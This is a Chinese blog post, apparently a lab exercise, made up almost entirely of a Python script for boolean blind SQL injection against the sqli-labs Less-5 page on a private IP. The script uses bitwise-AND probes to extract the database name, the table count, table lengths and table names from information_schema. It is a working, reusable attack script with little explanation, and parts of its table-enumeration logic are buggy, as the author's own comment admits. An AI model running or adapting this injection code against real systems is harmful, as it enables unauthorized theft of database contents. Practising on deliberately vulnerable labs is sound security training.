按位与操作盲注脚本

作者: 温华_599b | 来源:发表于2018-12-20 22:20 被阅读0次

按位与操作盲注脚本
CTF从入门到提升（五）部分截取函数及bool型盲注相关例题分
位运算
ios 中的位运算
理解C语言位运算符
Kali Linux系统利用DVWA靶场进测试SQL注入漏洞:
C高阶1：二进制操作
位运算运用的技巧
盲注
js中小数取整的方法

import requests

list1 = []
list2 = []
list3 = []
list4 = []

url1="http://192.168.23.133/2/Less-5/"
#猜测数据库长度
a = [128,64,32,16,8,4,2,1]
for x in range(10):
    url="http://192.168.23.133/2/Less-5/?id=1%27%20and%20length%28database%28%29%29=" +str(x) + "%23"
    content = requests.get(url).text
    
    if "You are in..........." in content:
        name_length = x
        break
    else:
        pass
print('数据库名长度为：',name_length)

#猜测数据库名称
i = 0
j = 8
for x in range(1,name_length+1):
    
    for y in a:

        url2=url1 + "?id=1%27%20and%20ascii(substr(database(),"+str(x)+",1))%20%26%20"+ str(y)+ "="+str(y)+"%23"
        # print (url2)
        result = requests.get(url2).text
        if "You are in..........." in result:
            list1.append('1')
        else:
            list1.append('0')

    newnum=''.join(list1)
    list2.append(chr(int(newnum[i:j],2)))
    i +=8
    j +=8
final_database=''.join(list2)
# print ('二进制数为：',newnum)       
print ('当前数据库名称为：',final_database)

#猜测表个数
for t1 in range(5):
    url8 = url1 + "?id=1%27and%20%28select%20count%28table_name%29%20from%20information_schema.tables%20where%20table_schema=%27"+ final_database + "%27%29=" + str(t1) + "%23"
    # print (url8)
    result_t1 = requests.get(url8).text
    # print (result_t1)
    if "You are in..........." in result_t1:
        table_num = t1
    else:
        pass    
print ('这个数据库表的个数为：',table_num)
# #猜测表长度
for q in range(table_num):
    for t in range(10):
        url3=url1 + "?id=1%27%20and%20(select length(TABLE_NAME)from information_schema.TABLES WHERE TABLE_SCHEMA=%27"+ final_database + "%27 limit " + str(q)+",1)=" + str(t) +"%23"
        # print(url3)
        result_t = requests.get(url3).text
        # print (result_t)
        if "You are in..........." in result_t:
            table_len = t
            table_num = q
            print ('第',table_num+1,'个表的长度为：',table_len)     
            break
        else:
            pass
# #猜测表名称
i2 = 0
j2 = 8
for w in range(0,table_num+1):
    for e in range (0,table_len+4):#这块有个问题 从上面循环下来最后一个表长度是5 
        for r in a:
            
            url4 = url1+"?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27"+ final_database + "%27%20limit%20"+str(w)+",1),"+str(e)+",1))%20%26%20"+ str(r)+"="+str(r)+"%23"
            # print (url4)
            result_m=requests.get(url4).text
            # print (result_m)
            if "You are in..........." in result_m:
                list3.append('1')
            else:
                list3.append('0')
        newlistnum=''.join(list3)
        # print (list3)

        list4.append(chr(int(newlistnum[i2:j2],2)))
        i2 +=8
        j2 +=8
        final_lname=''.join(list4)
# print ('二进制数为：',newlistnum)       
print ('当前库表的名称为：',final_lname)